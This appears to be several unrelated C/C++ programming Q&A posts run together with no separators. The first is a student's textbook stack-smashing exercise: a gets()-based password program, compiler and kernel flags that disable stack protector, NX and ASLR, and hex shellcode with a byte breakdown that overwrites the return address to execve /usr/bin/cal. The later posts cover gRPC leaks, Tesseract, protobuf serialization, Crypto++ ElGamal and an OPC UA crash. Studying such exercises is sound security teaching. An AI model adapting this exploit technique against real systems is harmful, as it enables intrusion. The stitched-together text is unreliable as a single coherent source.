I am doing some homework for university, and the book I am working from (Secure Coding in C and C++ by Robert Seacord) has the following example in it:
You write a simple enter-password program and perform a stack smash on it to make the terminal display a calendar snapshot. It's a really simple and straightforward example of stack smashing. Except I think the book we have to work through was written a long time ago, before modern protections started turning this sort of activity into a segmentation fault.
I have searched a lot of sites. I've added -fno-stack-protector to the g++ compiler flags and also set kernel.randomize_va_space=0, but neither of these allowed the exploit code to execute.
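For reference, here is how I compile and run it. I gather that on newer toolchains the stack is also non-executable by default, so I suspect something like -z execstack (and -no-pie) is needed as well, though I'm not sure of the exact flags for every g++ version:

$ g++ -g -fno-stack-protector -z execstack -no-pie main.cpp    # plus -m32 on a 64-bit machine
$ sudo sysctl -w kernel.randomize_va_space=0
$ ./a.out < exploit.bin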
Here is the password C++ code:
#include <cstring>
#include <stdio.h>
#include <iostream>

bool isPasswordOkay(void);

int main(void)
{
    bool PwStatus;

    puts("Enter password:");
    PwStatus = isPasswordOkay();
    if (PwStatus == false)
    {
        puts("Access denied");
        return 0;
    }
    else
        puts("Access granted");
    return 0;
}

bool isPasswordOkay(void)
{
    char Password[12];

    gets(Password);  // no bounds checking -- this is the intended overflow point
    if (!strcmp(Password, "goodpass"))
        return true;
    else
        return (false);
}
and here is the exploit code (exploit.bin):
000 31 32 33 34 35 36 37 38–39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34–35 36 37 38 E0 F9 FF BF "789012345678a. +"
020 31 C0 A3 FF F9 FF BF B0–0B BB 03 FA FF BF B9 FB "1+ú . +≠+. +≠v"
030 F9 FF BF 8B 15 FF F9 FF–BF CD 80 FF F9 FF BF 31 ". +ï§ . +−ç . +1"
040 31 31 31 2F 75 73 72 2F–62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal "
Once the password code has been compiled, I execute it by entering ./a.out < exploit.bin
When executed, the terminal returns "Segmentation fault (core dumped)". What it should show is a snapshot of the calendar from the "/usr/bin/cal" path embedded in exploit.bin.
My question is, is there a way to temporarily disable this segmentation fault in order to allow the exploit code to execute? This would allow me to then go on to do the section as I'm a bit stumped at the moment.
Thank you,
Jon
EDIT: Unfortunately I can't upload images yet as I'm new, but here is a link to a breakdown of the exploit.bin code: http://imgur.com/lpz9eY4
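In case the image is hard to read, the gist of the breakdown (my reading of the bytes above, so treat the exact addresses as approximate):

offset 0x00-0x1B   "1234...5678"      28 bytes of filler: overruns the 12-byte Password buffer up to the saved return address
offset 0x1C-0x1F   E0 F9 FF BF        overwrites the return address with 0xBFFFF9E0 (little-endian), pointing back into the buffer
offset 0x20-0x3E   31 C0 ... CD 80    i386 shellcode: roughly xor eax,eax / mov al,0x0B (execve) / int 0x80, with pointers into the data below
offset 0x3F-...    "111/usr/bin/cal"  the program path handed to execve, preceded by alignment padding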
My Visual Studio project that uses the gRPC library has memory leaks. After some R&D I made a little project to reproduce the problem and found that I don't even need to call any gRPC objects in my code.
My steps:
1) Get helloworld.proto from the examples
2) Generate the C++ files
3) Create a C++ project with the following code:
#include "helloworld.grpc.pb.h"
void f(){
helloworld::HelloRequest request;
}
int main(){
_CrtSetDbgFlag(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF);
return 0;
}
Part of the output (the full dump has 240 lines):
Detected memory leaks!
Dumping objects ->
{1450} normal block at 0x00FD77A0, 16 bytes long.
Data: <`{ t C | > 60 7B FD 00 20 74 FD 00 84 43 CA 00 88 7C CA 00
{1449} normal block at 0x00FECA30, 48 bytes long.
Data: <google.protobuf.> 67 6F 6F 67 6C 65 2E 70 72 6F 74 6F 62 75 66 2E
{1448} normal block at 0x00FEA048, 8 bytes long.
Data: < > 20 C6 FE 00 00 00 00 00
{1447} normal block at 0x00FEC610, 52 bytes long.
Data: < v p" v > B8 76 FC 00 70 22 FE 00 B8 76 FC 00 00 00 CD CD
{1441} normal block at 0x00FEA610, 32 bytes long.
Data: <google.protobuf.> 67 6F 6F 67 6C 65 2E 70 72 6F 74 6F 62 75 66 2E
{1440} normal block at 0x00FE9B78, 8 bytes long.
If I add a google::protobuf::ShutdownProtobufLibrary(); call before return 0;, I get much less output. Only this:
Detected memory leaks!
Dumping objects ->
{160} normal block at 0x00FCD858, 4 bytes long.
Data: < > 18 D6 B9 00
{159} normal block at 0x00FCD618, 4 bytes long.
Data: < > > C8 3E B9 00
{158} normal block at 0x00FCD678, 4 bytes long.
Data: < ? > D0 3F B9 00
Object dump complete.
But if I include some additional generated sources with many large services and messages, the memory dump gets much bigger.
So, since I don't actually use any gRPC objects directly, the only thing I can imagine is that some static objects are still alive when the VS memory dumper starts its work.
Is there a way to fix this, or a suggestion for what I can do about it?
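For reference, this is the variant with the shutdown call that produces the smaller dump (a minimal sketch; the crtdbg include and the comments are my additions):

#include <crtdbg.h>
#include <google/protobuf/stubs/common.h>   // ShutdownProtobufLibrary
#include "helloworld.grpc.pb.h"

int main(){
    _CrtSetDbgFlag(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF);

    // Release protobuf's static allocations before the CRT leak check
    // runs at exit; the three remaining blocks appear to come from
    // somewhere else (gRPC internals).
    google::protobuf::ShutdownProtobufLibrary();
    return 0;
}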
UPD:
I did some additional work around this problem and opened a new issue on the grpc repository bug tracker: https://github.com/grpc/grpc/issues/22506
The problem description on that issue contains screenshots of the leaked allocations' call stacks and gRPC debug traces.
UPD2:
I found all of them (version 1.23.0). I left a detailed comment there: https://github.com/grpc/grpc/issues/22506#issuecomment-618406755
I have encountered an issue while using the tesseract library. I have successfully compiled the leptonica and tesseract libs with VS2017. Now I have used these libraries in an MFC project, where everything compiles without any error. Here is the code:
tesseract::TessBaseAPI api;
if (0 != api.Init(NULL, _T("eng"), tesseract::OEM_DEFAULT))
{
    m_sState.Format(_T("tesseract initialize error"));
    return FALSE;
}
Nothing complicated, nothing wrong... but I ran into 2 problems:
Whether or not this code is executed, I have a massive memory leak.
Detected memory leaks!
Dumping objects ->
{65734} normal block at 0x014EEB88, 24 bytes long.
 Data: <        FXDebug > 10 00 00 00 08 00 00 00 46 58 44 65 62 75 67 00
{65733} normal block at 0x014EEB40, 24 bytes long.
 Data: <        FXDebug > 10 00 00 00 08 00 00 00 46 58 44 65 62 75 67 00
{65732} normal block at 0x03880908, 8 bytes long.
 Data: <        > 10 BE 96 0F 00 00 00 00
{65731} normal block at 0x014EBDA8, 32 bytes long.
 Data: < N  N  N        > A8 BD 4E 01 A8 BD 4E 01 A8 BD 4E 01 01 01 CD CD
{65730} normal block at 0x03880A20, 8 bytes long.
 Data: <        > 04 BE 96 0F 00 00 00 00
{65729} normal block at 0x014EE990, 24 bytes long.
Every time this code is executed, the app goes down the "tesseract initialize error" route. I don't understand why...
I have tried to run this project with VS2017 on Win10 64-bit; all libraries and my project are compiled as Debug, if that matters... Can you help me get tesseract to read simple images?
Last edit:
When I include this code in a console app:
#include <leptonica/allheaders.h>
#include <tesseract/baseapi.h>
#include <windows.h>    // GetLastError
#include <iostream>

int main()
{
    std::cout << "Hello World!\n";
    tesseract::TessBaseAPI api;
    if (0 != api.Init(NULL, NULL))
    {
        std::cout << "tesseract initialize error\n";
        std::cout << "Last error:" << GetLastError() << std::endl;
    }
}
I get the following error messages:
Hello World!
Error in pixReadMemTiff: function not present
Error in pixReadMem: tiff: no pix returned
Error in pixaGenerateFontFromString: pix not made
Error in bmfCreate: font pixa not made
Error opening data file C:\Program Files (x86)\Tesseract-OCR\eng.traineddata
Please make sure the TESSDATA_PREFIX environment variable is set to your "tessdata" directory.
Failed loading language 'eng'
Tesseract couldn't load any languages!
tesseract initialize error
Last error:3
but I don't have any "Tesseract-OCR" folder in "Program Files (x86)"...
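From the error text it looks like tesseract falls back to that hard-coded path when it cannot find the language data. A minimal sketch of pointing it at the data explicitly (the C:\tessdata path is a placeholder for wherever your .traineddata files actually live, and whether datapath means the tessdata folder itself or its parent differs between tesseract versions):

#include <tesseract/baseapi.h>
#include <iostream>

int main()
{
    tesseract::TessBaseAPI api;
    // Alternatively, set the TESSDATA_PREFIX environment variable
    // to this directory and pass NULL as the first argument.
    if (0 != api.Init("C:\\tessdata", "eng"))
    {
        std::cout << "tesseract initialize error\n";
        return 1;
    }
    std::cout << "tesseract initialized OK\n";
    return 0;
}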
My Protobuf message consists of 3 doubles:
syntax = "proto3";

message TestMessage {
    double input = 1;
    double output = 2;
    double info = 3;
}
When I set these values to
test.set_input(2.3456);
test.set_output(5.4321);
test.set_info(5.0);
the serialized message looks like
00000000 09 16 fb cb ee c9 c3 02 40 11 0a 68 22 6c 78 ba |........#..h"lx.|
00000010 15 40 19 |.#.|
00000013
when using test.SerializeToArray, and it could not be deserialized successfully by a Go program using the same protobuf message. When trying to read it from a C++ program, I got 0 as info, so the message seems to be corrupted.
When using test.SerializeToOstream I got this message, which could be deserialized successfully by both the Go and C++ programs.
00000000 09 16 fb cb ee c9 c3 02 40 11 0a 68 22 6c 78 ba |........#..h"lx.|
00000010 15 40 19 00 00 00 00 00 00 14 40 |.#........#|
0000001b
When setting the values to
test.set_input(2.3456);
test.set_output(5.4321);
test.set_info(5.5678);
the serialized messages produced by both test.SerializeToArray and test.SerializeToOstream look like
00000000 09 16 fb cb ee c9 c3 02 40 11 0a 68 22 6c 78 ba |........#..h"lx.|
00000010 15 40 19 da ac fa 5c 6d 45 16 40 |.#....\mE.#|
0000001b
and could be successfully read by both my Go and C++ programs.
What am I missing here? Why is SerializeToArray not working in the first case?
EDIT:
As it turns out, SerializeToString works fine, too.
Here is the code I used for the comparison:
file_a.open(FILEPATH_A);
file_b.open(FILEPATH_B);
test.set_input(2.3456);
test.set_output(5.4321);
test.set_info(5.0);
//serializeToArray
int size = test.ByteSize();
char *buffer = (char*) malloc(size);
test.SerializeToArray(buffer, size);
file_a << buffer;
//serializeToString
std::string buf;
test.SerializeToString(&buf);
file_b << buf;
file_a.close();
file_b.close();
Why does SerializeToArray not work as expected?
EDIT2:
When using file_b << buf.data() instead of file_b << buf, the data gets corrupted as well, but why?
I think the error you're making is treating binary data as character data and using character-data APIs. Many of those APIs stop at the first NUL byte (0), but that is a totally valid value in protobuf binary.
You basically need to make sure you don't use any such APIs: stick purely to binary-safe APIs.
Since you indicate that the size is 27, this all fits.
Basically, the binary representation of 5.0 includes 0 bytes, but you could easily have seen the same problem with other values in time.
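To make that concrete: 5.0 as an IEEE 754 double is 0x4014000000000000, so field 3 serializes as 19 00 00 00 00 00 00 14 40; a C-string API stops right after the 19, which is exactly where the truncated dump above ends. A minimal sketch of writing the buffer in a binary-safe way (file names are placeholders, and TestMessage is the class generated from the .proto above):

#include <fstream>
#include <string>
#include <vector>

void writeBoth(const TestMessage& test)
{
    // SerializeToArray path: write exactly `size` bytes; operator<< on a
    // char* is not length-aware and stops at the first 0 byte.
    std::ofstream file_a("out_a.bin", std::ios::binary);
    const int size = test.ByteSize();
    std::vector<char> buffer(size);
    test.SerializeToArray(buffer.data(), size);
    file_a.write(buffer.data(), size);

    // SerializeToString path: same idea, write with an explicit length.
    // (file_b << buf also works, because operator<< on std::string is
    // length-aware -- unlike on buf.data().)
    std::ofstream file_b("out_b.bin", std::ios::binary);
    std::string buf;
    test.SerializeToString(&buf);
    file_b.write(buf.data(), static_cast<std::streamsize>(buf.size()));
}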
I apologise in advance for the n00bishness of asking this question, but I've been stuck for ages and I'm struggling to figure out what to do next. Essentially, I am trying to perform ElGamal encryption on some data. I have been given the public part of an ephemeral key pair and a second static key, as well as some data. If my understanding is correct, this is all I need to perform the encryption, but I'm struggling to figure out how to do it using Crypto++.
I've looked endlessly for examples, but I can find literally zero on Google. Ohloh is less than helpful, as I just get back endless pages of the cryptopp ElGamal source files, which I can't seem to figure out (I'm relatively new to using Crypto++, and until about 3 days ago I hadn't even heard of ElGamal).
The closest I've been able to find as an example comes from the CryptoPP package itself, which is as follows:
bool ValidateElGamal()
{
    cout << "\nElGamal validation suite running...\n\n";
    bool pass = true;
    {
        FileSource fc("TestData/elgc1024.dat", true, new HexDecoder);
        ElGamalDecryptor privC(fc);
        ElGamalEncryptor pubC(privC);
        privC.AccessKey().Precompute();

        ByteQueue queue;
        privC.AccessKey().SavePrecomputation(queue);
        privC.AccessKey().LoadPrecomputation(queue);

        pass = CryptoSystemValidate(privC, pubC) && pass;
    }
    return pass;
}
However, this doesn't really seem to help me much, as I'm unaware of how to plug in my already-computed values. I'm not sure if I'm struggling with my understanding of how ElGamal works (entirely possible) or if I'm just being an idiot when it comes to using what I've got with Crypto++. Can anyone help point me in the right direction?
I have been given the public part of an ephemeral key pair and a second static key, as well as some data.
We can't really help you here because we know nothing about what is supposed to be done.
The ephemeral key pair is probably for simulating key exchange, and the static key is long-term for signing the ephemeral exchange. Other than that, it's anybody's guess as to what's going on.
Would you happen to know what the keys are? Is the ephemeral key a Diffie-Hellman key and the static key an ElGamal signing key?
If my understanding is correct, this is all I need to perform the encryption, but I'm struggling to figure out how using Crypto++.
For the encryption example, I'm going to cheat a bit and use an RSA encryption example and port it to ElGamal. This is about as difficult as copy and paste, because both RSA encryption and ElGamal encryption adhere to the PK_Encryptor and PK_Decryptor interfaces. See the PK_Encryptor and PK_Decryptor classes for details. (And keep in mind, you might need an ElGamal or Nyberg-Rueppel (NR) signing example.)
Crypto++ has a cryptosystem built on ElGamal. The cryptosystem will encrypt a large block of plain text under a symmetric key, and then encrypt the symmetric key under the ElGamal key. I'm not sure what standard it follows, though (likely IEEE's P1363). See SymmetricEncrypt and SymmetricDecrypt in elgamal.h.
The key size is artificially small so the program runs quickly. ElGamal is a discrete log problem, so its key size should be 2048-bits or higher in practice. 2048-bits is blessed by ECRYPT (Asia), ISO/IEC (Worldwide), NESSIE (Europe), and NIST (US).
If you need to save/persist/load the keys you generate, then see Keys and Formats on the Crypto++ wiki. The short answer is to call decryptor.Save() and decryptor.Load(); and stay away from the {BER|DER} encodings.
If you want, you can use a standard string rather than a SecByteBlock. The string will be easier if you are interested in printing stuff to the terminal via cout and friends.
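Something along these lines, for instance (a minimal sketch reusing the rng, encryptor, and decryptor objects from the program below; in older Crypto++ releases the byte type lives at global scope rather than in the CryptoPP namespace):

std::string plain = "ElGamal test", cipher, recovered;

// Size the ciphertext buffer, then encrypt the string's bytes directly
cipher.resize(encryptor.CiphertextLength(plain.size()));
encryptor.Encrypt(rng, reinterpret_cast<const CryptoPP::byte*>(plain.data()),
                  plain.size(), reinterpret_cast<CryptoPP::byte*>(&cipher[0]));

// Decrypt into a string, then trim it to the reported message length
recovered.resize(decryptor.MaxPlaintextLength(cipher.size()));
DecodingResult result = decryptor.Decrypt(rng,
    reinterpret_cast<const CryptoPP::byte*>(cipher.data()), cipher.size(),
    reinterpret_cast<CryptoPP::byte*>(&recovered[0]));
recovered.resize(result.messageLength);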
Finally, there's now a page on the Crypto++ Wiki covering the topic with the source code for the program below. See Crypto++'s ElGamal Encryption.
#include <iostream>
using std::cout;
using std::cerr;
using std::endl;
#include <cryptopp/osrng.h>
using CryptoPP::AutoSeededRandomPool;
#include <cryptopp/secblock.h>
using CryptoPP::SecByteBlock;
#include <cryptopp/elgamal.h>
using CryptoPP::ElGamal;
using CryptoPP::ElGamalKeys;
#include <cryptopp/cryptlib.h>
using CryptoPP::DecodingResult;

#include <cassert>   // assert
#include <cstring>   // memset
int main(int argc, char* argv[])
{
    ////////////////////////////////////////////////
    // Generate keys
    AutoSeededRandomPool rng;

    cout << "Generating private key. This may take some time..." << endl;

    ElGamal::Decryptor decryptor;
    decryptor.AccessKey().GenerateRandomWithKeySize(rng, 512);
    const ElGamalKeys::PrivateKey& privateKey = decryptor.AccessKey();

    ElGamal::Encryptor encryptor(decryptor);
    const ElGamalKeys::PublicKey& publicKey = encryptor.AccessKey();

    ////////////////////////////////////////////////
    // Secret to protect
    static const int SECRET_SIZE = 16;
    SecByteBlock plaintext( SECRET_SIZE );
    memset( plaintext, 'A', SECRET_SIZE );

    ////////////////////////////////////////////////
    // Encrypt

    // Now that there is a concrete object, we can validate
    assert( 0 != encryptor.FixedMaxPlaintextLength() );
    assert( plaintext.size() <= encryptor.FixedMaxPlaintextLength() );

    // Create cipher text space
    size_t ecl = encryptor.CiphertextLength( plaintext.size() );
    assert( 0 != ecl );
    SecByteBlock ciphertext( ecl );

    encryptor.Encrypt( rng, plaintext, plaintext.size(), ciphertext );

    ////////////////////////////////////////////////
    // Decrypt

    // Now that there is a concrete object, we can check sizes
    assert( 0 != decryptor.FixedCiphertextLength() );
    assert( ciphertext.size() <= decryptor.FixedCiphertextLength() );

    // Create recovered text space
    size_t dpl = decryptor.MaxPlaintextLength( ciphertext.size() );
    assert( 0 != dpl );
    SecByteBlock recovered( dpl );

    DecodingResult result = decryptor.Decrypt( rng, ciphertext, ciphertext.size(), recovered );

    // More sanity checks
    assert( result.isValidCoding );
    assert( result.messageLength <= decryptor.MaxPlaintextLength( ciphertext.size() ) );

    // At this point, we can set the size of the recovered
    // data. Until decryption occurs (successfully), we
    // only know its maximum size
    recovered.resize( result.messageLength );

    // SecByteBlock is overloaded for proper results below
    assert( plaintext == recovered );

    // If the assert fires, we won't get this far.
    if(plaintext == recovered)
        cout << "Recovered plain text" << endl;
    else
        cout << "Failed to recover plain text" << endl;

    return !(plaintext == recovered);
}
You can also create the Decryptor from a PrivateKey like so:
ElGamalKeys::PrivateKey k;
k.GenerateRandomWithKeySize(rng, 512);
ElGamal::Decryptor d(k);
...
And an Encryptor from a PublicKey:
ElGamalKeys::PublicKey pk;
privateKey.MakePublicKey(pk);
ElGamal::Encryptor e(pk);
You can save and load keys to and from disk as follows:
ElGamalKeys::PrivateKey privateKey1;
privateKey1.GenerateRandomWithKeySize(prng, 2048);
privateKey1.Save(FileSink("elgamal.der", true /*binary*/).Ref());
ElGamalKeys::PrivateKey privateKey2;
privateKey2.Load(FileSource("elgamal.der", true /*pump*/).Ref());
privateKey2.Validate(prng, 3);
ElGamal::Decryptor decryptor(privateKey2);
// ...
The keys are ASN.1 encoded, so you can dump them with something like Peter Gutmann's dumpasn1:
$ ./cryptopp-elgamal-keys.exe
Generating private key. This may take some time...
$ dumpasn1 elgamal.der
0 556: SEQUENCE {
4 257: INTEGER
: 00 C0 8F 5A 29 88 82 8C 88 7D 00 AE 08 F0 37 AC
: FA F3 6B FC 4D B2 EF 5D 65 92 FD 39 98 04 C7 6D
: 6D 74 F5 FA 84 8F 56 0C DD B4 96 B2 51 81 E3 A1
: 75 F6 BE 82 46 67 92 F2 B3 EC 41 00 70 5C 45 BF
: 40 A0 2C EC 15 49 AD 92 F1 3E 4D 06 E2 89 C6 5F
: 0A 5A 88 32 3D BD 66 59 12 A1 CB 15 B1 72 FE F3
: 2D 19 DD 07 DF A8 D6 4C B8 D0 AB 22 7C F2 79 4B
: 6D 23 CE 40 EC FB DF B8 68 A4 8E 52 A9 9B 22 F1
: [ Another 129 bytes skipped ]
265 1: INTEGER 3
268 257: INTEGER
: 00 BA 4D ED 20 E8 36 AC 01 F6 5C 9C DA 62 11 BB
: E9 71 D0 AB B7 E2 D3 61 37 E2 7B 5C B3 77 2C C9
: FC DE 43 70 AE AA 5A 3C 80 0A 2E B0 FA C9 18 E5
: 1C 72 86 46 96 E9 9A 44 08 FF 43 62 95 BE D7 37
: F8 99 16 59 7D FA 3A 73 DD 0D C8 CA 19 B8 6D CA
: 8D 8E 89 52 50 4E 3A 84 B3 17 BD 71 1A 1D 38 9E
: 4A C4 04 F3 A2 1A F7 1F 34 F0 5A B9 CD B4 E2 7F
: 8C 40 18 22 58 85 14 40 E0 BF 01 2D 52 B7 69 7B
: [ Another 129 bytes skipped ]
529 29: INTEGER
: 01 61 40 24 1F 48 00 4C 35 86 0B 9D 02 8C B8 90
: B1 56 CF BD A4 75 FE E2 8E 0B B3 66 08
: }
0 warnings, 0 errors.
I ran into this error and I don't quite understand what is happening here.
I hope the code snippet is sufficient to make my point.
I am modifying a callback to inject my own data into a response to a server.
Basically the callstack looks as follows:
mainRoutine(browseFunction(browseInternal), myBrowseFunction))
^ takes response ^ sends response ^ catches and modifies response
and sends callback
So what happens:
I have a server and a few hundred static nodes to be read. Now I want to support a highly dynamic messaging system; creating a node takes 300 kB, so that is not an option, as there are tens of thousands of them, created and deleted within seconds. Therefore I inject the message into the response and pretend a node was read.
So much for the theory. This system has already worked in another context, so there is no doubt the server can handle the fake response...
Some code: it is written in C++, but with the server stack in C there are no new or delete operators available. All variables are initialized and filled with sensible values, as far as possible.
volatile int pNoOfNodesToAppend = 5;

Boolean xAdapter::Browse(BaseNode *pNode, BrowseContext* pBrowseCtx, int i)
{
    [... some initializations ...]

    BrowseResult* pBrowseResult = &pResponse->Results[i];
    int NoOfReferences = pBrowseResult->NoOfReferences + pNoOfNodesToAppend;
    pResponse->NoOfResults = NoOfReferences;

    // Version one
    ReferenceDescription* refDesc = reinterpret_cast<ReferenceDescription *>(realloc(
        pBrowseResult->References,
        sizeof(OpcUa_ReferenceDescription) * NoOfReferences));

    // Version two, tried just out of curiosity to see whether copying "by hand"
    // would cause the program to crash because not enough memory was allocated --
    // but no problem there.
    /*
    ReferenceDescription* refDesc = reinterpret_cast<ReferenceDescription *>(
        malloc(NoOfReferences * sizeof(ReferenceDescription)));
    for (int k = 0; k < NoOfReferences; k++)
    {
        memcpy(&pBrowseResult->References[0], &pBrowseResult->References[k], sizeof(ReferenceDescription));
    }
    */

    int size = _msize(refDesc);               // note: runs before the NULL check below
    pBrowseResult->NoOfReferences = NoOfReferences;   // also set before the NULL check

    if (refDesc != NULL)
    {
        pBrowseResult->References = refDesc;
    }
    else
    {
        return False;
        /* Error handling ... */
    }

    [Fill with data... check for errors, handle errors]

    return True;
}
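(As an aside before going on: the usual defensive realloc pattern keeps the old pointer untouched until the new one has been validated, and only then updates the bookkeeping. A minimal sketch reusing the names from the snippet above:)

// Grow the References array; on failure the old block is still valid
// and still owned by pBrowseResult, so nothing is leaked or corrupted.
ReferenceDescription* grown = static_cast<ReferenceDescription*>(realloc(
    pBrowseResult->References, sizeof(ReferenceDescription) * NoOfReferences));
if (grown == NULL)
    return False;                      // leave the old buffer in place
pBrowseResult->References = grown;
pBrowseResult->NoOfReferences = NoOfReferences;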
I know the Browse code above looks cumbersome, but most of it cannot be done more simply due to the underlying stack, which gives me a hard time casting types back and forth through lots and lots of structures.
This code compiles and runs fine; once the callback is sent, it crashes with an access violation at 0xABABABAB, which, as I found out, is a magic number used by the Microsoft debug heap to mark the guard bytes around HeapAlloc() memory (4 bytes before and after).
See here: Magic_debug_values
Edit: This section is solved. I was just too blind to realize that we are talking about HEX here, and thus too dumb to calculate my numbers correctly. So consider it unworthy of reading, except for understanding the comments.
What really gives me a headache is the _msize of the newly allocated array.
NoOfReferences: 6
sizeof(ReferenceDescription): 0x00000080 unsigned int
(NoOfReferences * sizeof(ReferenceDescription)): 0x00000300 unsigned long
sizeof(*refDesc): 0x00000080 unsigned int   // first element of the array
_msize says:
size of (*refDesc): 0x00000300 int
Now WHY is the size of the newly allocated space 0x300? If my mind is not playing tricks on me, 6 * 80 is 480, and even if there were 8 guard bits around every single element, it would still be 72 * 6 > 300. (Of course, as the edit above says, these are hex values: 6 * 0x80 = 0x300, i.e. 6 * 128 = 768 bytes, which is exactly right.) Anyway, the system proceeds normally.
Now, in the next chunk of code, the structures in the array are filled with useful data and handed back to the response structure.
The callback is sent, the server goes back to ServerMain(), and then crashes with a first-chance and then unhandled exception:
Unhandled exception at 0x5f95ed6a in demoserver.exe: 0xC0000005:
Access violation reading location 0xabababab.
Memory
0x5F95ED6A f3 a5 ff 24 95 84 ee 95 5f 90 8b c7 ba 03 00 00 00 83 e9 04 72 ó¥ÿ$..î._..Ǻ....ƒé.r
0x5F95ED7F 0c 83 e0 03 03 c8 ff 24 85 98 ed 95 5f ff 24 8d 94 ee 95 5f 90 .ƒà..Èÿ$.˜í._ÿ$.”î._.
0x5F95ED94 ff 24 8d 18 ee 95 5f 90 a8 ed 95 5f d4 ed 95 5f f8 ed 95 5f 23 ÿ$..î._.¨í._Ôí._øí._#
0x5F95EDA9 d1 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 ÑŠ.ˆ.ŠF.ˆG.ŠF.Áé.ˆG.ƒ
0x5F95EDBE c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 84 ee 95 5f 8d 49 Æ.ƒÇ.ƒù.rÌó¥ÿ$..î._.I
0x5F95EDD3 00 23 d1 8a 06 88 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 .#ÑŠ.ˆ.ŠF.Áé.ˆG.ƒÆ.ƒÇ
0x5F95EDE8 02 83 f9 08 72 a6 f3 a5 ff 24 95 84 ee 95 5f 90 23 d1 8a 06 88 .ƒù.r¦ó¥ÿ$..î._.#ÑŠ.ˆ
0x5F95EDFD 07 83 c6 01 c1 e9 02 83 c7 01 83 f9 08 72 88 f3 a5 ff 24 95 84 .ƒÆ.Áé.ƒÇ.ƒù.rˆó¥ÿ$..
0x5F95EE12 ee 95 5f 8d 49 00 7b ee 95 5f 68 ee 95 5f 60 ee 95 5f 58 ee 95 î._.I.{î._hî._`î._Xî.
0x5F95EE27 5f 50 ee 95 5f 48 ee 95 5f 40 ee 95 5f 38 ee 95 5f 8b 44 8e e4 _Pî._Hî._#î._8î._.DŽä
0x5F95EE3C 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b .D.ä.DŽè.D.è.DŽì.D.ì.
0x5F95EE51 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 DŽð.D.ð.DŽô.D.ô.DŽø.D
0x5F95EE66 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 .ø.DŽü.D.ü........ð.ø
0x5F95EE7B ff 24 95 84 ee 95 5f 8b ff 94 ee 95 5f 9c ee 95 5f a8 ee 95 5f ÿ$..î._.ÿ”î._œî._¨î._
0x5F95EE90 bc ee 95 5f 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f .î._.E.^_ÉÃ.Š.ˆ..E.^_
0x5F95EEA5 c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d ÉÃ.Š.ˆ.ŠF.ˆG..E.^_ÉÃ.
So the mistake was found. The problem was neither the allocation nor the reassignment of the array, but rather the fact that the API didn't behave as expected and marshalled several callbacks. Trying to add mine by appending it crashed and caused the exception, as it was not meant to be done that way. (The solution and structure would be too complex to post here.)
Thank you for your time and hints anyway; I learned a lot while chasing the errors!